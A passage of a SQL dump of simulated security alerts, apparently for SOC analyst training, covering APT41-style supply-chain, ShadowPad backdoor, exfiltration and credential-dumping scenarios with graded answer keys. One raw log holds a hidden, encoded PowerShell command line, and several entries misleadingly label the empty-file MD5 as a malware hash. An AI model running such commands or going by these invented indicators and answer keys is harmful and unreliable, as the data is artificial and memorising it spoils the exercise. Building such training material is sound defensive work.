CMS.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.092Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_type\\\":\\\"user_account_creation\\\",\\\"user\\\":\\\"adminuser1\\\",\\\"created_by\\\":\\\"attacker_account\\\",\\\"created_at\\\":\\\"2023-10-05T14:20:00Z\\\",\\\"ip_address\\\":\\\"192.168.1.25\\\",\\\"external_ip\\\":\\\"203.0.113.5\\\",\\\"new_account\\\":{\\\"username\\\":\\\"backdooradmin\\\",\\\"privileges\\\":\\\"administrator\\\",\\\"creation_method\\\":\\\"web_interface\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"cms_user_mgmt.php\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.092Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_type\\\":\\\"user_account_creation\\\",\\\"user\\\":\\\"adminuser1\\\",\\\"created_by\\\":\\\"attacker_account\\\",\\\"created_at\\\":\\\"2023-10-05T14:20:00Z\\\",\\\"ip_address\\\":\\\"192.168.1.25\\\",\\\"external_ip\\\":\\\"203.0.113.5\\\",\\\"new_account\\\":{\\\"username\\\":\\\"backdooradmin\\\",\\\"privileges\\\":\\\"administrator\\\",\\\"creation_method\\\":\\\"web_interface\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"cms_user_mgmt.php\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.092Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event 
count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_type\\\":\\\"user_account_creation\\\",\\\"user\\\":\\\"adminuser1\\\",\\\"created_by\\\":\\\"attacker_account\\\",\\\"created_at\\\":\\\"2023-10-05T14:20:00Z\\\",\\\"ip_address\\\":\\\"192.168.1.25\\\",\\\"external_ip\\\":\\\"203.0.113.5\\\",\\\"new_account\\\":{\\\"username\\\":\\\"backdooradmin\\\",\\\"privileges\\\":\\\"administrator\\\",\\\"creation_method\\\":\\\"web_interface\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"cms_user_mgmt.php\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.092Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_type\\\":\\\"user_account_creation\\\",\\\"user\\\":\\\"adminuser1\\\",\\\"created_by\\\":\\\"attacker_account\\\",\\\"created_at\\\":\\\"2023-10-05T14:20:00Z\\\",\\\"ip_address\\\":\\\"192.168.1.25\\\",\\\"external_ip\\\":\\\"203.0.113.5\\\",\\\"new_account\\\":{\\\"username\\\":\\\"backdooradmin\\\",\\\"privileges\\\":\\\"administrator\\\",\\\"creation_method\\\":\\\"web_interface\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"cms_user_mgmt.php\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.092Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:23:45Z\\\",\\\"event_type\\\":\\\"user_account_creation\\\",\\\"user\\\":\\\"adminuser1\\\",\\\"created_by\\\":\\\"attacker_account\\\",\\\"created_at\\\":\\\"2023-10-05T14:20:00Z\\\",\\\"ip_address\\\":\\\"192.168.1.25\\\",\\\"external_ip\\\":\\\"203.0.113.5\\\",\\\"new_account\\\":{\\\"username\\\":\\\"backdooradmin\\\",\\\"privileges\\\":\\\"administrator\\\",\\\"creation_method\\\":\\\"web_interface\\\"},\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"cms_user_mgmt.php\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(484, 'Social Media Amplification Detected', 'medium', 'Social Media Monitoring Tools', 'A bot network was detected disseminating fake articles across various social media platforms, amplifying false narratives.', 'Lateral Movement', 'T1090 - Connection Proxy', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:30Z\",\"event_id\":\"SMAT-4567\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"192.168.1.15\",\"username\":\"social_bot_user\",\"filename\":\"amplification_script.py\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"url\":\"http://examplemalicioussite.com/fake-news\",\"action\":\"post\",\"platform\":\"SocialMediaNet\",\"article_title\":\"Breaking News: Major Event Unfolds\",\"article_id\":\"art-7890\"}', '2026-01-05 03:22:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Associated with known botnet activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Recognized internal host.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"social_bot_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Unusual behavior detected.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"amplification_script.py\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Repository\",\"verdict\":\"malicious\",\"details\":\"Script used for spreading misinformation.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"d41d8cd98f00b204e9800998ecf8427e is the MD5 of a zero-byte file, so it cannot identify any malware sample; obtain the real hash of amplification_script.py before block_hash is actioned.\"}},
{\"id\":\"artifact_6\",\"type\":\"url\",\"value\":\"http://examplemalicioussite.com/fake-news\",\"is_critical\":true,\"osint_result\":{\"source\":\"Web Reputation Service\",\"verdict\":\"malicious\",\"details\":\"Site used for hosting fake news.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.093Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:30Z\\\",\\\"event_id\\\":\\\"SMAT-4567\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"social_bot_user\\\",\\\"filename\\\":\\\"amplification_script.py\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"url\\\":\\\"http://examplemalicioussite.com/fake-news\\\",\\\"action\\\":\\\"post\\\",\\\"platform\\\":\\\"SocialMediaNet\\\",\\\"article_title\\\":\\\"Breaking News: Major Event Unfolds\\\",\\\"article_id\\\":\\\"art-7890\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.093Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:30Z\\\",\\\"event_id\\\":\\\"SMAT-4567\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"social_bot_user\\\",\\\"filename\\\":\\\"amplification_script.py\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"url\\\":\\\"http://examplemalicioussite.com/fake-news\\\",\\\"action\\\":\\\"post\\\",\\\"platform\\\":\\\"SocialMediaNet\\\",\\\"article_title\\\":\\\"Breaking News: Major Event Unfolds\\\",\\\"article_id\\\":\\\"art-7890\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.093Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:30Z\\\",\\\"event_id\\\":\\\"SMAT-4567\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"social_bot_user\\\",\\\"filename\\\":\\\"amplification_script.py\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"url\\\":\\\"http://examplemalicioussite.com/fake-news\\\",\\\"action\\\":\\\"post\\\",\\\"platform\\\":\\\"SocialMediaNet\\\",\\\"article_title\\\":\\\"Breaking News: Major Event Unfolds\\\",\\\"article_id\\\":\\\"art-7890\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.093Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:30Z\\\",\\\"event_id\\\":\\\"SMAT-4567\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"social_bot_user\\\",\\\"filename\\\":\\\"amplification_script.py\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"url\\\":\\\"http://examplemalicioussite.com/fake-news\\\",\\\"action\\\":\\\"post\\\",\\\"platform\\\":\\\"SocialMediaNet\\\",\\\"article_title\\\":\\\"Breaking News: Major Event Unfolds\\\",\\\"article_id\\\":\\\"art-7890\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.093Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:30Z\\\",\\\"event_id\\\":\\\"SMAT-4567\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\",\\\"username\\\":\\\"social_bot_user\\\",\\\"filename\\\":\\\"amplification_script.py\\\",\\\"hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"url\\\":\\\"http://examplemalicioussite.com/fake-news\\\",\\\"action\\\":\\\"post\\\",\\\"platform\\\":\\\"SocialMediaNet\\\",\\\"article_title\\\":\\\"Breaking News: Major Event Unfolds\\\",\\\"article_id\\\":\\\"art-7890\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(485, 'Data Exfiltration Attempt Detected', 'high', 'Network Traffic Analysis', 'Finally, the attackers attempted to exfiltrate sensitive data from the CMS, aiming to use it for further operations or to sell on the dark web.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T19:45:00Z\",\"source_ip\":\"192.168.1.105\",\"destination_ip\":\"203.0.113.55\",\"protocol\":\"HTTPS\",\"port\":443,\"filename\":\"sensitive_cms_data.zip\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user\":\"jdoe\",\"action\":\"exfiltration_attempt\",\"alert_id\":\"EXFIL-2023-001\",\"malicious_url\":\"https://malicious.example.com/upload\",\"detected_by\":\"IDS\",\"description\":\"A data exfiltration attempt was detected by analyzing outgoing traffic from internal IP 192.168.1.105 to external IP 203.0.113.55 using HTTPS protocol.\"}', '2026-01-05 03:22:52', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network_check\",\"verdict\":\"internal\",\"details\":\"Internal company network IP address.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel_service\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known exfiltration activities.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_reputation_service\",\"verdict\":\"suspicious\",\"details\":\"File hash matches known suspicious file signature.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"sensitive_cms_data.zip\",\"is_critical\":true,\"osint_result\":{\"source\":\"file_analysis\",\"verdict\":\"suspicious\",\"details\":\"File name indicates potential sensitive 
data.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(486, 'Initial Access via Compromised Supplier Network', 'high', 'Third-party network traffic logs', 'APT41 successfully exploited vulnerabilities in the supplier\'s network to gain initial access to the video game developer\'s environment, leveraging compromised credentials and known malware.', 'Supply Chain Compromise', 'T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:47:23Z\",\"event_id\":\"123456789\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"username\":\"supplier_admin\",\"malware_filename\":\"ccleaner_setup.exe\",\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"action\":\"login_success\",\"protocol\":\"https\",\"url\":\"https://supplier-compromised.com/update\",\"message\":\"Successful login from external IP using compromised credentials. Known malicious file transferred.\"}', '2026-01-05 03:26:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT41 operations.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of video game developer\'s server.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"supplier_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Logs\",\"verdict\":\"suspicious\",\"details\":\"Compromised credentials used for unauthorized access.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"d41d8cd98f00b204e9800998ecf8427e is the MD5 of a zero-byte file, not a hash of the trojanised CCleaner installer, and identifies no sample; obtain the real hash of ccleaner_setup.exe before block_hash is actioned.\"}}],
\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(487, 'Execution of Malicious Code in Build Environment', 'critical', 'Build server activity logs', 'APT41 executed a code injection attack by embedding a ShadowPad backdoor into the game executable during the build process, leveraging access to the build environment.', 'Code Injection', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-20T14:35:12Z\",\"build_server\":\"build-server-01\",\"user\":\"jdoe\",\"internal_ip\":\"192.168.50.24\",\"external_ip\":\"203.0.113.45\",\"malicious_file\":\"game_exec_v2.exe\",\"malicious_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"injected_payload\":\"ShadowPad.dll\",\"event_description\":\"Detected execution of a code injection attack involving the ShadowPad backdoor.\"}', '2026-01-05 03:26:48', '2026-02-16 18:19:39', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.50.24\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the build server.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"Associated with previous APT41 attacks.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Malicious hash associated with ShadowPad backdoor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"ShadowPad.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Known malicious payload used by APT41.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.097Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:35:12Z\\\",\\\"build_server\\\":\\\"build-server-01\\\",\\\"user\\\":\\\"jdoe\\\",\\\"internal_ip\\\":\\\"192.168.50.24\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malicious_file\\\":\\\"game_exec_v2.exe\\\",\\\"malicious_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"injected_payload\\\":\\\"ShadowPad.dll\\\",\\\"event_description\\\":\\\"Detected execution of a code injection attack involving the ShadowPad backdoor.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.097Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:35:12Z\\\",\\\"build_server\\\":\\\"build-server-01\\\",\\\"user\\\":\\\"jdoe\\\",\\\"internal_ip\\\":\\\"192.168.50.24\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malicious_file\\\":\\\"game_exec_v2.exe\\\",\\\"malicious_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"injected_payload\\\":\\\"ShadowPad.dll\\\",\\\"event_description\\\":\\\"Detected execution of a code injection attack involving the ShadowPad backdoor.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.097Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:35:12Z\\\",\\\"build_server\\\":\\\"build-server-01\\\",\\\"user\\\":\\\"jdoe\\\",\\\"internal_ip\\\":\\\"192.168.50.24\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malicious_file\\\":\\\"game_exec_v2.exe\\\",\\\"malicious_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"injected_payload\\\":\\\"ShadowPad.dll\\\",\\\"event_description\\\":\\\"Detected execution of a code injection attack involving the ShadowPad backdoor.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.097Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:35:12Z\\\",\\\"build_server\\\":\\\"build-server-01\\\",\\\"user\\\":\\\"jdoe\\\",\\\"internal_ip\\\":\\\"192.168.50.24\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malicious_file\\\":\\\"game_exec_v2.exe\\\",\\\"malicious_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"injected_payload\\\":\\\"ShadowPad.dll\\\",\\\"event_description\\\":\\\"Detected execution of a code injection attack involving the ShadowPad backdoor.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.097Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-20T14:35:12Z\\\",\\\"build_server\\\":\\\"build-server-01\\\",\\\"user\\\":\\\"jdoe\\\",\\\"internal_ip\\\":\\\"192.168.50.24\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malicious_file\\\":\\\"game_exec_v2.exe\\\",\\\"malicious_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"injected_payload\\\":\\\"ShadowPad.dll\\\",\\\"event_description\\\":\\\"Detected execution of a code injection attack involving the ShadowPad backdoor.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(488, 'Establishing Persistence with ShadowPad', 'high', 'Endpoint detection and response (EDR) logs', 'APT41 has installed the ShadowPad backdoor on a compromised system running a vulnerable gaming application. This action establishes a covert channel for persistent access, typical of APT41\'s tactics in targeting the gaming industry.', 'Backdoor Installation', 'T1059.001 - PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:23:45Z\",\"event_id\":\"123456789\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.1.1.25\",\"user\":\"john.doe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -nop -w hidden -encodedcommand W3N0YXJ0IC1wYXJhbSB7ZXhwbG9pdC5leGUgfQ==\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"ShadowPad.dll\",\"severity\":\"high\",\"description\":\"ShadowPad backdoor installation detected via PowerShell execution on host 10.1.1.25 by user john.doe.\"}', '2026-01-05 03:26:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT41 external IP used in ShadowPad campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.1.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local network host potentially compromised.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"john.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"d41d8cd98f00b204e9800998ecf8427e is the MD5 of a zero-byte file and cannot identify a ShadowPad sample; pivot on the encoded PowerShell command line and the loaded ShadowPad.dll, and obtain the real file hash before block_hash is actioned.\"}},
{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"ShadowPad.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Reputation Service\",\"verdict\":\"malicious\",\"details\":\"File linked to ShadowPad backdoor.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(489, 'Lateral Movement Across Player Networks', 'high', 'User authentication logs', 'APT41 has been detected using the ShadowPad backdoor to perform credential dumping for lateral movement across player networks.', 'Credential Dumping', 'T1003.006 - OS Credential Dumping: DCSync', 1, 'new', NULL, '{\"timestamp\":\"2023-10-23T13:45:00Z\",\"event_type\":\"authentication_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.101\",\"username\":\"gamer123\",\"auth_method\":\"NTLM\",\"hashed_password\":\"e99a18c428cb38d5f260853678922e03\",\"malware_filename\":\"shadowpad.dll\",\"process_id\":4567,\"event_description\":\"Credential dumping attempt detected from external IP using NTLM authentication method.\",\"related_hash\":\"f3c6c09f0c3e3c4b1ee2f6f9c5e8f9df\",\"related_ip\":\"10.0.0.15\"}', '2026-01-05 03:26:48', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known APT41 activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.101\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP within player network.\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"gamer123\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"clean\",\"details\":\"Legitimate user 